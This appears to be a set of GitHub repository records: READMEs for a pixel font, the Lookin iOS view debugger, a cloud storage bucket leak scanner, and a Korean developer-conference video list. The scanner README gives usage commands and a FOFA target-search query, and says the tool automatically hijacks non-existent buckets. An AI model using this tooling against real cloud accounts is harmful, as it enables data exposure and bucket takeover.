Builder](https://github.com/TakWolf/pixel-font-builder) - [FontTools](https://github.com/fonttools/fonttools) - [Unidata Blocks](https://github.com/TakWolf/unidata-blocks) - [Character Encoding Utils](https://github.com/TakWolf/character-encoding-utils) - [PyYAML](https://github.com/yaml/pyyaml) - [PyPNG](https://gitlab.com/drj11/pypng) - [Pillow](https://github.com/python-pillow/Pillow) - [Beautiful Soup](https://www.crummy.com/software/BeautifulSoup/) - [Jinja](https://github.com/pallets/jinja) - [GitPython](https://github.com/gitpython-developers/GitPython) - [HTTPX](https://github.com/encode/httpx) ## ่ตžๅŠฉ ๅฆ‚ๆžœ่ฟ™ไธช้กน็›ฎๅฏนๆ‚จๆœ‰ๅธฎๅŠฉ๏ผŒ่ฏท่€ƒ่™‘่ตžๅŠฉๆฅๆ”ฏๆŒๅผ€ๅ‘ๅทฅไฝœใ€‚ [![่ตž่ต็ ](https://raw.githubusercontent.com/TakWolf/TakWolf/master/images/badge-payqr@2x.png)](https://github.com/TakWolf/TakWolf/blob/master/payment-qr-codes.md) [![็ˆฑๅ‘็”ต](https://raw.githubusercontent.com/TakWolf/TakWolf/master/images/badge-afdian@2x.png)](https://afdian.net/@takwolf) ่ฏท้€š่ฟ‡ไธ‹้ข็š„้“พๆŽฅๆฅๆŸฅ็œ‹ๆ”ถๅˆฐ็š„่ตžๅŠฉ็š„ๅ…ทไฝ“ๆƒ…ๅ†ต๏ผš [่ตžๅŠฉ่ฏฆๆƒ…](https://github.com/TakWolf/TakWolf/blob/master/sponsors.md)
ๅผ€ๆบๅƒ็ด ๅญ—ไฝ“ใ€‚ๆ”ฏๆŒ 8ใ€10 ๅ’Œ 12 ๅƒ็ด ใ€‚
font,fonts,pixel,cjk,game
18
1
0
456
9
2
1
hughkli/Lookin
![Preview](https://cdn.lookin.work/public/style/images/independent/homepage/preview_en_1x.jpg "Preview") # Introduction You can inspect and modify views in iOS app via Lookin, just like UI Inspector in Xcode, or another app called Reveal. Official Website๏ผšhttps://lookin.work/ # Integration Guide To use Lookin macOS app, you need to integrate LookinServer (iOS Framework of Lookin) into your iOS project. > **Warning** Never integrate LookinServer in Release building configuration. ## via CocoaPods: ### Swift Project `pod 'LookinServer', :subspecs => ['Swift'], :configurations => ['Debug']` ### Objective-C Project `pod 'LookinServer', :configurations => ['Debug']` ## via Swift Package Manager: `https://github.com/QMUI/LookinServer/` # Repository LookinServer: https://github.com/QMUI/LookinServer macOS app: https://github.com/hughkli/Lookin/ # Tips - How to display custom information in Lookin: https://bytedance.larkoffice.com/docx/TRridRXeUoErMTxs94bcnGchnlb - How to display more member variables in Lookin: https://bytedance.larkoffice.com/docx/CKRndHqdeoub11xSqUZcMlFhnWe - How to turn on Swift optimization for Lookin: https://bytedance.larkoffice.com/docx/GFRLdzpeKoakeyxvwgCcZ5XdnTb - Documentation Collection: https://bytedance.larkoffice.com/docx/Yvv1d57XQoe5l0xZ0ZRc0ILfnWb # Acknowledgements https://qxh1ndiez2w.feishu.cn/docx/YIFjdE4gIolp3hxn1tGckiBxnWf --- # ็ฎ€ไป‹ Lookin ๅฏไปฅๆŸฅ็œ‹ไธŽไฟฎๆ”น iOS App ้‡Œ็š„ UI ๅฏน่ฑก๏ผŒ็ฑปไผผไบŽ Xcode ่‡ชๅธฆ็š„ UI Inspector ๅทฅๅ…ท๏ผŒๆˆ–ๅฆไธ€ๆฌพๅซๅš Reveal ็š„่ฝฏไปถใ€‚ ๅฎ˜็ฝ‘๏ผšhttps://lookin.work/ # ๅฎ‰่ฃ… LookinServer Framework ๅฆ‚ๆžœ่ฟ™ๆ˜ฏไฝ ็š„ iOS ้กน็›ฎ็ฌฌไธ€ๆฌกไฝฟ็”จ Lookin๏ผŒๅˆ™้œ€่ฆๅ…ˆๆŠŠ LookinServer ่ฟ™ๆฌพ iOS Framework ้›†ๆˆๅˆฐไฝ ็š„ iOS ้กน็›ฎไธญใ€‚ > **Warning** ่ฎฐๅพ—ไธ่ฆๅœจ AppStore ๆจกๅผไธ‹้›†ๆˆ LookinServerใ€‚ ## ้€š่ฟ‡ CocoaPods๏ผš ### Swift ้กน็›ฎ `pod 'LookinServer', :subspecs => ['Swift'], :configurations => ['Debug']` ### Objective-C ้กน็›ฎ `pod 'LookinServer', :configurations => ['Debug']` ## ้€š่ฟ‡ Swift Package Manager: `https://github.com/QMUI/LookinServer/` # ๆบไปฃ็ ไป“ๅบ“ iOS ็ซฏ LookinServer๏ผšhttps://github.com/QMUI/LookinServer macOS ็ซฏ่ฝฏไปถ๏ผšhttps://github.com/hughkli/Lookin/ # ๆŠ€ๅทง - ๅฆ‚ไฝ•ๅœจ Lookin ไธญๅฑ•็คบ่‡ชๅฎšไน‰ไฟกๆฏ: https://bytedance.larkoffice.com/docx/TRridRXeUoErMTxs94bcnGchnlb - ๅฆ‚ไฝ•ๅœจ Lookin ไธญๅฑ•็คบๆ›ดๅคšๆˆๅ‘˜ๅ˜้‡: https://bytedance.larkoffice.com/docx/CKRndHqdeoub11xSqUZcMlFhnWe - ๅฆ‚ไฝ•ไธบ Lookin ๅผ€ๅฏ Swift ไผ˜ๅŒ–: https://bytedance.larkoffice.com/docx/GFRLdzpeKoakeyxvwgCcZ5XdnTb - ๆ–‡ๆกฃๆฑ‡ๆ€ป๏ผšhttps://bytedance.larkoffice.com/docx/Yvv1d57XQoe5l0xZ0ZRc0ILfnWb # ้ธฃ่ฐข https://qxh1ndiez2w.feishu.cn/docx/YIFjdE4gIolp3hxn1tGckiBxnWf
Free macOS app for iOS view debugging.
null
6
4
6
195
3
12
0
UzJu/Cloud-Bucket-Leak-Detection-Tools
![image-20220703203021188](images/image-20220703203021188.png) # :rooster:ไฝฟ็”จๆ•™็จ‹ ```bash git clone https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git cd Cloud-Bucket-Leak-Detection-Tools/ # ๅฎ‰่ฃ…ไพ่ต– ๅปบ่ฎฎไฝฟ็”จPython3.8ไปฅไธŠ็š„็‰ˆๆœฌ ๆˆ‘็š„็‰ˆๆœฌ: Python 3.9.13 (main, May 24 2022, 21:28:31) # ๅทฒ็ปๆต‹่ฏ•็‰ˆๆœฌๅฆ‚ไธ‹ # 1ใ€python3.8.9 # 2ใ€python3.9.13 # 3ใ€python3.7 # 4ใ€python3.6.15 # 5ใ€python3.9.6 pip3 install -r requirements.txt python3 main.py -h ``` ![image-20220716140707903](images/image-20220716140707903.png) ไฝฟ็”จไน‹ๅ‰้œ€่ฆๅœจ`config/conf.py`ๆ–‡ไปถ้…็ฝฎ่‡ชๅทฑๅฏนๅบ”็š„ไบ‘ๅŽ‚ๅ•†AK ![image-20220716140934866](images/image-20220716140934866.png) ## 1ใ€้˜ฟ้‡Œไบ‘ๅญ˜ๅ‚จๆกถ ### 1.1ใ€ๅ•ไธชๅญ˜ๅ‚จๆกถๆฃ€ๆต‹ ```bash python3 main.py -aliyun [ๅญ˜ๅ‚จๆกถURL] ``` ![image-20220716141132931](images/image-20220716141132931.png) ### 1.2ใ€่‡ชๅŠจๅญ˜ๅ‚จๆกถๅŠซๆŒ ๅฝ“ๅฆ‚ๆžœๆฃ€ๆต‹ๅญ˜ๅ‚จๆกถไธๅญ˜ๅœจๆ—ถไผš่‡ชๅŠจๅŠซๆŒ่ฏฅๅญ˜ๅ‚จๆกถ ![image-20220703202339058](images/image-20220703202339058.png) ### 1.3ใ€ๆ‰น้‡ๅญ˜ๅ‚จๆกถๅœฐๅ€ๆฃ€ๆต‹ ```bash # fofa่ฏญๆณ• domain="aliyuncs.com" server="AliyunOSS"domain="aliyuncs.com" ``` ```bash # ไฝฟ็”จ-faliyun python3 main.py -faliyun url.txt ``` ![image-20220716141356518](images/image-20220716141356518.png) ## 2ใ€่…พ่ฎฏไบ‘ๅญ˜ๅ‚จๆกถ ```bash python3 main.py -tcloud [ๅญ˜ๅ‚จๆกถๅœฐๅ€] ``` ![image-20220716141554856](images/image-20220716141554856.png) ## 3ใ€ๅŽไธบไบ‘ๅญ˜ๅ‚จๆกถ ```bash python3 main.py -hcloud [ๅญ˜ๅ‚จๆกถๅœฐๅ€] ``` ![image-20220716141948046](images/image-20220716141948046.png) ## 4ใ€AWSๅญ˜ๅ‚จๆกถ ```bash python3 main.py -aws [ๅญ˜ๅ‚จๆกถๅœฐๅ€] ``` ![image-20220716142431142](images/image-20220716142431142.png) ## 5ใ€ๆ‰ซๆ็ป“ๆžœไฟๅญ˜ ๆ‰ซๆ็ป“ๆžœไผšๅญ˜ๆ”พๅœจ`results`็›ฎๅฝ•ไธ‹ ![image-20220716142617997](images/image-20220716142617997.png) ![image-20220716142641883](images/image-20220716142641883.png) # :cop:0xFFFFFFFF ๅ…่ดฃๅฃฐๆ˜Ž 1ใ€ๆœฌๅทฅๅ…ทๅชไฝœไธบๅญฆๆœฏไบคๆต๏ผŒ็ฆๆญขไฝฟ็”จๅทฅๅ…ทๅš่ฟๆณ•็š„ไบ‹ๆƒ… 2ใ€ๅชๆ˜ฏๅ†™็€็Žฉ 3ใ€ๆˆ‘็š„ๅพฎไฟก > ๅฆ‚ๆžœไฝ ๆœ‰ๆ›ดๅฅฝ็š„ๅปบ่ฎฎๆˆ–่€…ไบคไธชๆœ‹ๅ‹ <img src="images/157070417-dbb7886f-1bb8-412f-a30b-0f85bc8ffa10.png" alt="image" style="zoom:33%;" /> 4ใ€ๅšๅฎข: UzzJu.com 5ใ€ๅ…ฌไผ—ๅท ![image-20220716143619529](images/image-20220716143619529.png) ## 404ๆ˜Ÿ้“พ่ฎกๅˆ’ ![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png) **Cloud-Bucket-Leak-Detection-Tools** ็ŽฐๅทฒๅŠ ๅ…ฅ [404ๆ˜Ÿ้“พ่ฎกๅˆ’](https://github.com/knownsec/404StarLink) # ๆ›ฒ็บฟๅ›พ [![Stargazers over time](images/Cloud-Bucket-Leak-Detection-Tools.svg)](https://starchart.cc/UzJu/Cloud-Bucket-Leak-Detection-Tools)
ๅ…ญๅคงไบ‘ๅญ˜ๅ‚จ๏ผŒๆณ„้œฒๅˆฉ็”จๆฃ€ๆต‹ๅทฅๅ…ท
null
3
1
2
42
8
1
0
hibuz/dev-conf-replay
[![RSS](https://img.shields.io/badge/rss-F88900?logo=rss&logoColor=white)](https://github.com/hibuz/dev-conf-replay/commits/main.atom) [![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fhibuz/dev-conf-replay%2Fhit-counter&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com) [![Links](https://github.com/hibuz/dev-conf-replay/actions/workflows/check_links.yml/badge.svg)](https://github.com/hibuz/dev-conf-replay/actions/workflows/check_links.yml) # ๊ตญ๋‚ด IT ์„ธ๋ฏธ๋‚˜ ๋ฐ ๊ฐœ๋ฐœ์ž ์ปจํผ๋Ÿฐ์Šค (๋‹ค์‹œ๋ณด๊ธฐ) ๐Ÿ˜Ž โœจ ์‹ ๊ทœ์˜์ƒ - `2024.06.03` [`IT๊ธฐ์—…`](#it๊ธฐ์—…) > 6์›” ์šฐ์•„ํ•œํ…Œํฌ์„ธ๋ฏธ๋‚˜ > [๊ธ€๋กœ๋ฒŒ ๊ฐœ๋ฐœ์ž๋กœ ์„ฑ์žฅํ•˜๋Š” ๋ฒ•](https://youtu.be/Nb2RnQzxu4I?list=PLgXGHBqgT2TtGi82mCZWuhMu-nQy301ew) - `2024.05.29` [`์ปค๋ฎค๋‹ˆํ‹ฐ`](#์ปค๋ฎค๋‹ˆํ‹ฐ) > AWSKRUG ํ”„๋ก ํŠธ์—”๋“œ ์†Œ๋ชจ์ž„ > [Next.js์™€ AWS ECS, CI/CD ๊ทธ๋ฆฌ๊ณ  CDN์„ ๊ณ๋“ค์ธ](https://youtu.be/dCZKSMO_ebg?list=PLX2fs3661XpNfRSZ9TD_xyQdegvtNDsdw) - `2024.05.28` [`์ธ๊ณต์ง€๋Šฅ`](#์ธ๊ณต์ง€๋Šฅ) > ๋ชจ๋‘ํŒ > [์˜จ๋””๋ฐ”์ด์Šค AI ๋ฐ ๋กœ์ปฌ AI์˜ ๋„์ „ ๊ณผ์ œ](https://youtu.be/mlebHixCgXQ?list=PLv6H9ngYdJbKcGl2VrVBr8YAClPcVrrim) โšก ๋ฐ”๋กœ๊ฐ€๊ธฐ > [`IT๊ธฐ์—…`](#it๊ธฐ์—…) [`์ธ๊ณต์ง€๋Šฅ`](#์ธ๊ณต์ง€๋Šฅ) [`๋น…๋ฐ์ดํ„ฐ`](#๋น…๋ฐ์ดํ„ฐ) [`ํด๋ผ์šฐ๋“œ`](#ํด๋ผ์šฐ๋“œ) [`์ธํ”„๋ผ & ๋ฐ๋ธŒ์˜ต์Šค`](#์ธํ”„๋ผ--๋ฐ๋ธŒ์˜ต์Šค) [`๋ธ”๋ก์ฒด์ธ`](#๋ธ”๋ก์ฒด์ธ) [`๋ชจ๋นŒ๋ฆฌํ‹ฐ`](#๋ชจ๋นŒ๋ฆฌํ‹ฐ) [`๊ฒŒ์ž„`](#๊ฒŒ์ž„) [`๋ณด์•ˆ`](#๋ณด์•ˆ) [`๋ชจ๋ฐ”์ผ`](#๋ชจ๋ฐ”์ผ) [`ํ”„๋ก ํŠธ์—”๋“œ & JS`](#ํ”„๋ก ํŠธ์—”๋“œ--js) [`ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ธ์–ด`](#ํ”„๋กœ๊ทธ๋ž˜๋ฐ-์–ธ์–ด) [`์˜คํ”ˆ์†Œ์Šค`](#์˜คํ”ˆ์†Œ์Šค) [`๊ต์œก`](#๊ต์œก) [`์ปค๋ฎค๋‹ˆํ‹ฐ`](#์ปค๋ฎค๋‹ˆํ‹ฐ) [`๊ธฐํƒ€`](#๊ธฐํƒ€) ## ๊ฐœ๋ฐœ๊ด€๋ จ ์œ ํŠœ๋ธŒ ์ฑ„๋„ - updated at `2024.05.06` 1. `59.7๋งŒ` ์กฐ์ฝ”๋”ฉ JoCoding > https://www.youtube.com/@jocoding 2. `49.4๋งŒ` ๋…ธ๋งˆ๋“œ ์ฝ”๋” Nomad Coders > https://www.youtube.com/@nomadcoders 3. `34.6๋งŒ` ์ƒํ™œ์ฝ”๋”ฉ > https://www.youtube.com/@coohde 4. `34.1๋งŒ` ๋‚˜๋„์ฝ”๋”ฉ > https://www.youtube.com/@nadocoding 5. `26.8๋งŒ` ์ฝ”๋”ฉ์• ํ”Œ > https://www.youtube.com/@codingapple 6. `17.2๋งŒ` ๋“œ๋ฆผ์ฝ”๋”ฉ > https://www.youtube.com/@dream-coding 7. `17.0๋งŒ` ๋™๋นˆ๋‚˜ > https://www.youtube.com/@dongbinna 8. `16.3๋งŒ` ์ฝ”๋”ฉํ•˜๋Š”๊ฑฐ๋‹ˆ > https://www.youtube.com/@gunnycoding 9. `14.6๋งŒ` ์›Œ๋‹ˆ์ฝ”๋”ฉ > https://www.youtube.com/@WonieSong 10. `11.1๋งŒ` ๊ฐœ๋ฐœ์ž ๋ผ๋ผ > https://www.youtube.com/@devlala ## IT๊ธฐ์—… - ๋„ค์ด๋ฒ„ - [DEVIEW](https://deview.kr) - [2020](https://tv.naver.com/v/16968202/list/657024) | [2021](https://tv.naver.com/v/23700321/list/753227) | [2023](https://www.youtube.com/playlist?list=PLsFtzQAC8dDcQAcSG4PNrW7-0ExDZqqJA) - 2023.02.27~28 - TECH CONCERT - [2020](https://tv.naver.com/v/15353556/list/629240) - 2020.08.19~20 - [NAVER Search Colloquium](https://searchcolloquium.naver.com) - [2021](https://tv.naver.com/v/20307278/list/709884) | [2022](https://tv.naver.com/v/26581332/list/785512) - 2022.05.03 - [NAVER ENGINEERING DAY 2023](https://www.youtube.com/playlist?list=PLsFtzQAC8dDfk-KmvmagozbYtQ2Fmpmpi) - 2023.07.31 - ์นด์นด์˜ค - [if(kakao)](https://if.kakao.com) - [2020](https://elseif.kakao.com/2020) | [2021](https://elseif.kakao.com/2021) | [2022](https://if.kakao.com/session?t.bab36uRci8=0) - 2022.12.07~09 - [kakao tech meet](https://tech.kakao.com/) - [์ œ1ํšŒ](https://www.youtube.com/playlist?list=PLwe9WEhzDhwF36thY2_SVoayAz_KRWv_f), [์ œ2ํšŒ](https://www.youtube.com/playlist?list=PLwe9WEhzDhwFk-bT7qYW0w8TPddhsQU0u), [์ œ3ํšŒ](https://www.youtube.com/playlist?list=PLwe9WEhzDhwHzbY2_YFUZs0qjGo3CnnDf), [์ œ4ํšŒ](https://www.youtube.com/playlist?list=PLwe9WEhzDhwHa1EDC2e2-XCpIrgHMsvtn), [์ œ5ํšŒ](https://www.youtube.com/playlist?list=PLwe9WEhzDhwEIEMal76jXu70_L8ad-k-Y) - 2024.06.13 - ๋ผ์ธ - LINE [DEVELOPER DAY](https://linedevday.linecorp.com) - [2020](https://www.youtube.com/playlist?list=PLI2S-k0Fa59vrCkUC9G8kiu7w4PRXJI_5) | [2021](https://www.youtube.com/playlist?list=PLI2S-k0Fa59uUuHm1z3kxCFw8rC8t6G13) | [Tech-Verse 2022](https://www.youtube.com/playlist?list=PLMfHuI-eghZngpW8gzd6RAMlMwmwiN0Bg) - 2022.11.17~18 - [๊ฐœ๋ฐœ์ž ๋ฐ‹์—…](https://www.youtube.com/playlist?list=PLCLlfefjD20Dxye1oiE8NBaFG9pMEg1dC) - 2023.02.23 - ์ฟ ํŒก - [Reveal](https://event.coupangcorp.com) - [2020](https://www.youtube.com/playlist?list=PLPEWOJIs9P6gZJU6aXPilU-kXHVXOPiNz) | [2021](https://www.youtube.com/playlist?list=PLPEWOJIs9P6jjpZqjLMt4GrwxjZ4xRaNp) - 2021.12.09 - ๋ฐฐ๋‹ฌ์˜ ๋ฏผ์กฑ - [์šฐ์•„์ฝ˜](https://woowacon.com) - [2020](https://www.youtube.com/playlist?list=PLgXGHBqgT2TuFNlBkBRqf57__Z5IKfo8U) | [2021](https://www.youtube.com/playlist?list=PLgXGHBqgT2Ttcttvjy5_4GacLPcs6iM-s) | [2022](https://youtu.be/dReFpG8aVwU?list=PLgXGHBqgT2TsFnKRe3_kvFXDFUWxaUvQ2) | [2023](https://www.youtube.com/playlist?list=PLgXGHBqgT2TundZ81MAVHPzeYOTeII69j) - 2023.11.15 - โœจ [์šฐ์•„ํ•œํ…Œํฌ์„ธ๋ฏธ๋‚˜: ๋งค ์›” ๋งŒ๋‚˜๋Š” ๊ธฐ์ˆ  ์ด์•ผ๊ธฐ](https://www.youtube.com/playlist?list=PLgXGHBqgT2TtGi82mCZWuhMu-nQy301ew) - 2024.06.03 - [์ด๊ฒŒ ๋ฌด์Šจ ์ผ์ด์•ผ! ์ปจํผ๋Ÿฐ์Šค](https://www.youtube.com/playlist?list=PLu6f31_SRNTiOEKsCAZxdBeWL2UyKk_Lg) - 2022.04.01 - [์šฐ์•„ํ•œ PM์˜ ๋ฐค๐ŸŒ™](https://www.youtube.com/playlist?list=PLu6f31_SRNTjfCd5y7aLypDTI_IKDxL-t) - 2022.07.07 - ํ† ์Šค - [SLASH](https://toss.im/slash-23) - [21, 22, 23](https://www.youtube.com/playlist?list=PL1DJtS1Hv1PiGXmgruP1_gM2TSvQiOsFL) - 2023.06.08~09 - Simplicity(ํ† ์Šค ๋””์ž์ธ ์ปจํผ๋Ÿฐ์Šค) - [21](https://www.youtube.com/playlist?list=PL1DJtS1Hv1PgAekdTPF0lKtfsqAis3HXR) - 2021.08.30~09.02 - ์‚ผ์„ฑ - SDC Korea - [2022](https://www.youtube.com/playlist?list=PL7PfK8Mp1rLEoOveKoz9vs6BA8eXuy_O8) | [2023](https://www.youtube.com/playlist?list=PL7PfK8Mp1rLEfUuYXsZMnBqtFcAIqbAk7) - 2023.11.14~15 - ์‚ผ์„ฑSDS - Gen AI Day - 2024 [์œ ํ†ต/๋ฆฌํ…Œ์ผ](https://www.youtube.com/playlist?list=PL5CBKg4LPW2cml2-MqeWDwEcu9zAsGLsz), [๊ณต๊ณต](https://www.youtube.com/playlist?list=PL5CBKg4LPW2dTQHClWbAJzD6NPfi-PDf4) - 2024.04.19 - Techtonic - [2020](https://www.samsungsds.com/kr/event/techtonic2020.html) | [2021](https://www.samsungsds.com/kr/event/techtonic2021.html) - 2021.11.23~24 - REAL SUMMIT - [2020](https://www.youtube.com/playlist?list=PL5CBKg4LPW2fDDfTrui3MJdwy3NgK2ziW) | [2021](https://www.youtube.com/playlist?list=PL5CBKg4LPW2fIhDRr7ljbAv208eyHVGSN) | [2022](https://www.samsungsds.com/kr/real/real-summit-2022.html) | [2023](https://www.youtube.com/playlist?list=PL5CBKg4LPW2cIzr4JDfR7LFl3GJcQrb5p) - 2023.09.12 - SK - [SK ICT Tech Summit](https://www.sktechsummit.com) - [2022](https://www.youtube.com/@sktechsummit/playlists) | [2023](https://www.sktechsummit.com/sessions/sessionsList.do) - 2023.11.16~17 - [๋ฐ๋ณด์…˜(DEVOCEAN)](https://devocean.sk.com) - [ํ…Œํฌ ์„ธ๋ฏธ๋‚˜](https://www.youtube.com/playlist?list=PLxMQvxfkXLNmbZAB6THj_RQyCrc6Ok5eS) - 2023.12.21 - ๋ฐ๋ณด์…˜(DEVOCEAN) - ํ…Œํฌ ๋ฐ์ด [์ œ1ํšŒ](https://www.youtube.com/playlist?list=PLxMQvxfkXLNm1W2_JZFIxCeuxhDev7j7C) | [์ œ2ํšŒ](https://www.youtube.com/playlist?list=PLxMQvxfkXLNkhtvGiIsUlmPYwUJAp97IA) | [์ œ3ํšŒ](https://www.youtube.com/playlist?list=PLxMQvxfkXLNlZTU9yUzwXy6XItgql69M_) | [์ œ4ํšŒ](https://www.youtube.com/playlist?list=PLxMQvxfkXLNkem4QIPXR24Uwdd3IyOHtJ) | [์ œ5ํšŒ](https://www.youtube.com/playlist?list=PLxMQvxfkXLNm5BAsvXC1SItjHApQh3gPe) - 2023.10.20 - LG CNS - [๋‰ด ๋…ธ๋ฉ€์‹œ๋Œ€์— ํ•„์š”ํ•œ Application Modernization](https://www.youtube.com/playlist?list=PLxcN3kbNdAoAYrRZjyfqp9Mv5Au2mJduT) | [CloudXper ProOps Launching Webinar](https://www.youtube.com/playlist?list=PLxcN3kbNdAoA8N1kDA9ur88spcxOAf-dg) | [Security Summit 2021](https://www.youtube.com/playlist?list=PLxcN3kbNdAoBZhTTb_X_-xZfNGsss2hle) | [Entrue SMART DX 2021](https://www.youtube.com/playlist?list=PLxcN3kbNdAoDeRx9vqmpJRPJsASECi8qw) - 2021.09.14 - [AI Day 2020](https://www.youtube.com/playlist?list=PLxcN3kbNdAoBte9-xyUhS43tWPbiBubah) - 2020.10.15 ## ์ธ๊ณต์ง€๋Šฅ - ๋„ค์ด๋ฒ„ - CLOVA [AI NOW](https://naver-ai-now.kr) - [2021](https://tv.naver.com/v/20386632/list/710578) - 2021.05.25 - LG [AI Research](https://www.lgresearch.ai) - LG AI Talk Concert - [2021](https://www.youtube.com/playlist?list=PL8gIGFY2fYQSMXOINKgJBp0v_UP92-4UZ) | [2022](https://youtu.be/pmvJK6ZNkHY?list=PL8gIGFY2fYQSMXOINKgJBp0v_UP92-4UZ&t=586) | [2023](https://youtu.be/tbeGE19qIk4?list=PL8gIGFY2fYQSMXOINKgJBp0v_UP92-4UZ) - 2023.07.19 - ๋ชจ๋‘์˜ ์—ฐ๊ตฌ์†Œ - [๋ชจ๋‘์ฝ˜](https://moducon.kr) - [2021](https://www.youtube.com/playlist?list=PLv6H9ngYdJbLS2OdGLlL0IslWlhJHgg_L) | [2022](https://www.youtube.com/playlist?list=PLv6H9ngYdJbLJFzeqS0i4ZeYeRHDaXUak) | [2023](https://www.youtube.com/playlist?list=PLv6H9ngYdJbJbdzsU7QfXdFMHuXa95Fvj) - 2023.12.09 - โœจ [๋ชจ๋‘ํŒ | Pop Pop ํ„ฐ์ง€๋Š” AI ์„ธ๋ฏธ๋‚˜](https://www.youtube.com/playlist?list=PLv6H9ngYdJbKcGl2VrVBr8YAClPcVrrim) - 2024.05.28 - ์ฝ”์นญ์Šคํ„ฐ๋”” ์„ธ๋ฏธ๋‚˜ - [ํŒŒ์ด์ฌ์œผ๋กœ ์ปค๋ฆฌ์–ด](https://youtu.be/mxuWqUzbD6c?list=PLv6H9ngYdJbIvGCrGWYFfpS0vhkgZjzXj&t=1750), [๋ฐ์ดํ„ฐ๋กœ](https://youtu.be/jwnUenNGF04) ์Šคํ‚ฌ UP! - 2022.11.15 - ๊ฐ€์งœ์—ฐ๊ตฌ์†Œ - [Pseudo Lab](https://www.facebook.com/groups/pseudolab) - [PseudoCon 2020](https://www.youtube.com/playlist?list=PLyP9gclj-bv6Mn0XFJa1fiNppjGVaILp4) | [์ œ 2ํšŒ](https://www.youtube.com/playlist?list=PLyP9gclj-bv5ctl36Z-ysQO2U3TRzODDG) - 2021.05.21 - ์—…์Šคํ…Œ์ด์ง€ - [๐Ÿ–ฅ Tech Talks](https://www.youtube.com/playlist?list=PLkeKJYdfv8RLyrQ5WriBcKxMwjmc0c01T) - 2022.03.04 - [๐Ÿ’กInsight Talks](https://www.youtube.com/playlist?list=PLkeKJYdfv8RKPlYhfvsZe2_ugniN2JogS) - 2022.05.26 - ๋ž˜๋ธ”์—… - Lablup conf [1st](https://www.youtube.com/playlist?list=PLYkiFpaI5DIJEfSxXJRhiF_bQF6u9KFLb) | [2nd](https://www.youtube.com/playlist?list=PLYkiFpaI5DILsreVr61Jw2Jgjf3BoCZGV) | [3rd](https://www.youtube.com/playlist?list=PLYkiFpaI5DIKZF61XDM2ENBDyPvwVhNnB) - 2023.10.21 - ์†”ํŠธ๋ฃฉ์Šค - ์†”ํŠธ๋ฃฉ์Šค ์ธ๊ณต์ง€๋Šฅ ์ปจํผ๋Ÿฐ์Šค(SAC) - [2020](https://youtu.be/f_w3s18CGLg?list=PLQKhpTP94IsenU1Z_PSU-4HRWJ--NO_9l) | [2021](https://youtu.be/1nEc4UVaZOU?list=PLQKhpTP94IsenU1Z_PSU-4HRWJ--NO_9l) | [2022](https://youtu.be/D5fOutPofgk) | [2023](https://youtu.be/V_7xw0Nr5CE?list=PLQKhpTP94IscWoPTzE6DaZmCGVpup6acb) - 2023.09.07 - ์ „์ž์‹ ๋ฌธ ์›จ๋น„๋‚˜ ์ „๋ฌธ๋ฐฉ์†ก [allshow TV](https://www.allshowtv.com) - AIยทDATA Summit Korea - [2022](https://www.youtube.com/playlist?list=PLumdCu9Q56KqdRLic5zBLPZ3ahrUdN05W) | [2023](https://www.youtube.com/playlist?list=PLumdCu9Q56Kps9gFH2inwXqM2F1AASWhE) - 2023.02.24 - AIยทDX Summit Korea - [2022](https://www.youtube.com/playlist?list=PLumdCu9Q56Kpjjo1SW29u0XnT7JiMNMU0) | [2023](https://www.youtube.com/playlist?list=PLumdCu9Q56KqVnoGXp13ItTijqQq8-uCr) - 2023.05.26 - AI ์ฐจ์„ธ๋Œ€ ์ปจํƒ์„ผํ„ฐ ์ปจํผ๋Ÿฐ์Šค 2021 [์ œ4ํšŒ](https://www.youtube.com/playlist?list=PLumdCu9Q56KqLcP6rG01k0CyR9gnbE3kY) | [์ œ5ํšŒ](https://www.youtube.com/playlist?list=PLumdCu9Q56KpsceRGouaf0hEUNmx2taQ8) | 2022 [์ œ6ํšŒ](https://www.youtube.com/playlist?list=PLumdCu9Q56KrgyTJ8rK4JpxSlBy9cMp2Y) | [2023](https://www.youtube.com/playlist?list=PLumdCu9Q56Kp6LCKlJ8S2hCgxwHd-_sOM), [์ œ9ํšŒ](https://www.youtube.com/playlist?list=PLumdCu9Q56KrqL3THdXlkNjBGN6bmsqts) - 2023.09.06 - [2021 AI & Big Data Smart Convergence](https://www.youtube.com/playlist?list=PLumdCu9Q56Kp_SM7qG6ILsleZJTe-zXVy) - 2021.09.09 - ๋Œ€๋•ํŠน๊ตฌ SPACE-S - ๋Œ€์ „๋Ÿฌ๋‹๋ฐ์ด - [DLD 2022](https://www.youtube.com/playlist?list=PLudxIRsX4I3Sj6R-4INhtyNXqC0U5mFuU) - 2022.10.25 - [INNOPOLIS AI ์„ธ๋ฏธ๋‚˜](https://www.youtube.com/channel/UCJwSFW3lKme5XUZF-cjSPoQ/featured) - 2023.07.26 - Deeplearning Playground ์ปค๋ฎค๋‹ˆํ‹ฐ - [์•ˆ๋…•ํ•˜์„ธ์š” Korea, from W&B](https://youtu.be/sW3VxlJl46o) - 2022.03.26 - ๊ธฐํƒ€ - [2022 Connect to Code(C2C) - ์‚ฐ์—… ํ™˜๊ฒฝ์˜ ๋””์ง€ํ„ธ ์ „ํ™˜์„ ์œ„ํ•œ AI & ๋จธ์‹ ๋Ÿฌ๋‹](https://youtu.be/As3D_NINZ44?t=1769) - 2022.11.15 ## ๋น…๋ฐ์ดํ„ฐ - ํ•œ๊ตญ๋ฐ์ดํ„ฐ์‚ฐ์—…์ง„ํฅ์› - [๋ฐ์ดํ„ฐ ๊ทธ๋žœ๋“œ ์ปจํผ๋Ÿฐ์Šค](https://dataconference.or.kr) - [2020](https://www.youtube.com/playlist?list=PLimZR7g-UQN_UZCckMVWe52Ei8SKimY2o) | [2021](https://www.youtube.com/playlist?list=PLimZR7g-UQN8W9IUPqPl-e0yx-Z6nLzWH) | [2022](https://www.youtube.com/playlist?list=PLimZR7g-UQN_LUB4hqb1UB-RNiNWawE_W) | [2023](https://www.youtube.com/playlist?list=PLimZR7g-UQN8wghJypx86DncmYzPg1Akd) - 2023.12.14 - ๋ฐ์ดํ„ฐ์•ผ๋†€์ž - ๋ฐ์ดํ„ฐ์•ผ๋†€์ž - [2020](https://www.youtube.com/playlist?list=PL7yPwpDiPFlIO4tiVwCZ391JJ2KwhZzDU) | 